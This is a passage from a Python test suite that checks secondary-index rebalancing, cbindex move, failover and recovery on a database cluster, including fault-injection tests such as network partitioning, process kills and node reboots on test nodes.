# # run a /cleanupRebalance after a rebalance failure
# for index_server in index_servers:
# output = self.rest.cleanup_indexer_rebalance(server=index_server)
# log.info(output)
def test_cbindex_move_after_kv_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
to_add_nodes1 = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes1, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
to_add_nodes2 = [self.servers[self.nodes_init + 1]]
services_in = ["kv"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], to_add_nodes2, [],
services=services_in)
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes1, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_when_gsi_rebalance_is_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], [index_server],
services=services_in)
self.sleep(3)
output, error = self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
expect_failure=True, alter_index=self.alter_index)
if "Cannot Process Move Index - Rebalance/MoveIndex In Progress" not in str(error):
self.fail("cbindex move succeeded during a rebalance")
else:
self.log.info("Index alteration failed as expected")
rebalance.result()
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_rebalance_of_kv_node_during_index_creation_and_building(self):
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["kv"]
# start create index and build index
self.run_operation(phase="before")
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(name,age,address) USING GSI WITH {'num_replica': 1}"
t1 = threading.Thread(target=self._create_replica_index, args=(create_index_query,))
t1.start()
try:
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init], to_add_nodes, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
log.info(
"If there are multiple services in the cluster and rebalance is done, all services get the request to rebalance.\
As indexer is running DDL, it will fail with : indexer rebalance failure - ddl in progress")
else:
self.fail("indexer rebalance succeeded when it should have failed")
t1.join()
self.run_operation(phase="after")
kv_nodes = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
# kv node should succeed
self.assertTrue(len(kv_nodes), 2)
def test_network_partitioning_during_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
self.start_firewall_on_node(index_server)
self.start_firewall_on_node(self.servers[self.nodes_init])
self.sleep(20)
# rebalance out a indexer node
log.info("start rebalance during network partitioning")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
log.info("rebalance failed during network partitioning: {0}".format(str(ex)))
finally:
self.stop_firewall_on_node(index_server)
self.stop_firewall_on_node(self.servers[self.nodes_init])
self.run_operation(phase="after")
def test_cbindex_move_when_ddl_is_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
# start create index, build index
t1 = threading.Thread(target=self._build_index)
t1.start()
self.sleep(60)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes,
expect_failure=True,
alter_index=self.alter_index)
if error:
self.fail("Alter index failed. Error: %s" % error)
else:
self.log.info("Index alteration succeed as expected")
self.run_operation(phase="during")
t1.join()
self.run_operation(phase="after")
def test_indexer_compaction_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# start indexer compaction when rebalance is running
self._set_indexer_compaction()
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_bucket_compaction_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Do some kv mutations for so that compaction can kick in
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# start indexer compaction when rebalance is running
self._set_bucket_compaction()
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_when_indexer_is_in_paused_state(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Do some kv mutations
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
# Ensure indexer reaches to paused state
failover_nodes = [kv_server[1], index_server]
self._push_indexer_off_the_cliff()
# Try kv and index failover when indexer is in paused state
failover_task = self.cluster.async_failover([self.master], failover_nodes=failover_nodes, graceful=False)
failover_task.result()
for failover_node in failover_nodes:
self.rest.add_back_node("ns_1@" + failover_node.ip)
self.rest.set_recovery_type(otpNode="ns_1@" + failover_node.ip, recoveryType="full")
# rebalance out a node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
RestHelper(self.rest).rebalance_reached()
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail when indexer is in paused state")
def test_rebalance_deferred_index_then_build_index(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# create index with defer_build = True
self._create_index_with_defer_build()
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
# Now build the index on the new node
exceptions = self._build_index()
if exceptions:
self.fail("build index after rebalance failed")
self.sleep(60)
self.run_operation(phase="after")
def test_drop_index_during_kv_rebalance(self):
self.run_operation(phase="before")
to_add_nodes1 = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes1, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
to_add_nodes2 = [self.servers[self.nodes_init + 1]]
services_in = ["kv"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], to_add_nodes2, [],
services=services_in)
self.sleep(2)
self.run_async_index_operations(operation_type="drop_index")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
# TODO : Relook at it after MB-23135 is fixed
def test_cbindex_move_with_not_active_indexes(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, alter_index=self.alter_index)
self.run_operation(phase="during")
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.sleep(30)
exceptions = self._build_index()
self.sleep(30)
if exceptions:
self.fail("build index after cbindex move failed. See MB-23135 for more details")
self.run_operation(phase="after")
def test_cbindex_move_negative(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
# cbindex move with invalid source host. Not applicable for alter index
output, error = self._cbindex_move(self.servers[self.nodes_init + 1],
self.servers[self.nodes_init], indexes,
expect_failure=True,
alter_index=False)
if not [x for x in error if 'Error occured' in x]:
self.fail("cbindex move did not fail with expected error message")
# cbindex move with invalid destination host
output, error = self._cbindex_move(index_server, self.servers[
self.nodes_init + 1], indexes, expect_failure=True,
alter_index=self.alter_index)
if "Unable to find Index service for destination" not in str(error):
self.fail(
"index creation did not fail with expected error : {0}".format(
str(error)))
else:
self.log.info("Index creation failed as expected")
# cbindex move with destination host not reachable
output, error = self._cbindex_move(index_server, "some_junk_value",
indexes, expect_failure=True,
alter_index=self.alter_index)
if "Unable to find Index service for destination" not in str(error):
self.fail(
"index creation did not fail with expected error : {0}".format(
str(error)))
else:
self.log.info("Index creation failed as expected")
def test_gsi_rebalance_with_1_node_out_and_2_nodes_in(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = [nodes_out_list]
services_in = ["index,n1ql", "index,fts"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_with_2_nodes_out_and_1_node_in(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, nodes_out_list,
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, nodes_out_list, swap_rebalance=True)
self.run_operation(phase="after")
def test_mulitple_equivalent_index_on_same_node_and_rebalance_to_multiple_nodes(self):
# Generate multiple equivalent indexes on the same node
self.run_operation(phase="before")
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_airlines_data_query_definitions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = [nodes_out_list]
services_in = ["index", "index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 2], [], to_remove_nodes)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_mulitple_equivalent_index_on_multiple_nodes_and_rebalance_to_single_node(self):
# Generate multiple equivalent indexes on the same node
self.run_operation(phase="before")
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_airlines_data_query_definitions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], nodes_out_list)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, nodes_out_list, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_negative_indexnames(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
# cbindex move with invalid src host not valid for alter index query
_, error = self._cbindex_move(self.servers[self.nodes_init + 1], "", indexes, expect_failure=True)
if not [x for x in error if 'Error occured invalid index specified' in x]:
self.fail("cbindex move did not fail with expected error message")
def test_kv_failover_when_ddl_in_progress(self):
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
t1 = threading.Thread(target=self.run_operation, args=("before",))
t1.start()
self.sleep(5)
# failover the kv node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[kv_node], graceful=False)
failover_task.result()
t1.join()
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# do a full recovery and rebalance
self.sleep(30)
self.rest.set_recovery_type('ns_1@' + kv_node.ip, "full")
self.rest.add_back_node('ns_1@' + kv_node.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_index_failover_when_ddl_in_progress(self):
index_node = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
t1 = threading.Thread(target=self.run_operation, args=("before",))
t1.start()
self.sleep(5)
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_node], graceful=False)
failover_task.result()
t1.join()
self.sleep(30)
# do a full recovery and rebalance
self.sleep(30)
self.rest.set_recovery_type('ns_1@' + index_node.ip, "full")
self.rest.add_back_node('ns_1@' + index_node.ip)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
log.info(map_before_rebalance)
log.info(stats_map_before_rebalance)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
log.info(map_after_rebalance)
log.info(stats_map_after_rebalance)
self.run_operation(phase="after")
def test_build_index_when_kv_rebalance_in_progress(self):
kv_node = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.sleep(30)
services_in = ["kv"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [kv_node])
self.run_operation(phase="before")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception:
# See MB-22983 for more details
log.info(
"If there are multiple services in the cluster and rebalance is done, all services get the request to rebalance.\
As indexer is running DDL, it will fail with : indexer rebalance failure - ddl in progress")
self.run_operation(phase="after")
def test_erl_crash_on_indexer_node_during_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node when querying is in progress
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.kill_erlang(index_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after erl crash")
self.sleep(180)
self.run_operation(phase="after")
def test_erl_crash_on_kv_node_during_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
kv_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node when querying is in progress
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.kill_erlang(kv_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after erl crash")
# Allow time for the cluster to recover from the failure
self.sleep(60)
self.run_operation(phase="after")
def test_memcache_crash_on_kv_node_during_gsi_rebalance(self):
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
# Indexes might take more time to build, so sleep for 3 mins
self.sleep(180)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node when querying is in progress
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
self.kill_memcached1(kv_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
self.fail("rebalance failed after memcached got killed: {0}".format(str(ex)))
self.run_operation(phase="after")
def test_kv_rebalance_when_cbindex_move_in_progress(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
services_in = ["kv"]
to_add_nodes1 = [self.servers[self.nodes_init + 1]]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes1, [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
def test_kv_failover_when_cbindex_move_in_progress(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
# failover the kv node when cbindex move is in progress
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
failover_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=False)
failover_task.result()
self.sleep(30)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
# do a full recovery and rebalance
self.rest.set_recovery_type('ns_1@' + kv_server.ip, "full")
self.rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
# Relook once MB-23399 is fixed
def test_index_failover_when_cbindex_move_in_progress(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init+2]
services_in = ["index", "index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
# failover the indexer node when cbindex move is in progress which is not involved in cbindex move
failover_task = self.cluster.async_failover([self.master], failover_nodes=[self.servers[self.nodes_init + 1]],
graceful=False)
failover_task.result()
self.sleep(30)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [], swap_rebalance=False)
# do a rebalance
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init + 1], [], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
def test_reboot_on_kv_node_during_gsi_rebalance(self):
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(15)
# reboot a kv node during gsi rebalance
self.reboot_node(kv_server[1])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance stopped by janitor" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after kv node reboot")
self.sleep(30)
self.run_operation(phase="after")
index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# run a /cleanupRebalance after a rebalance failure
for index_server in index_servers:
output = self.rest.cleanup_indexer_rebalance(server=index_server)
log.info(output)
def test_cbindex_move_invalid_data(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
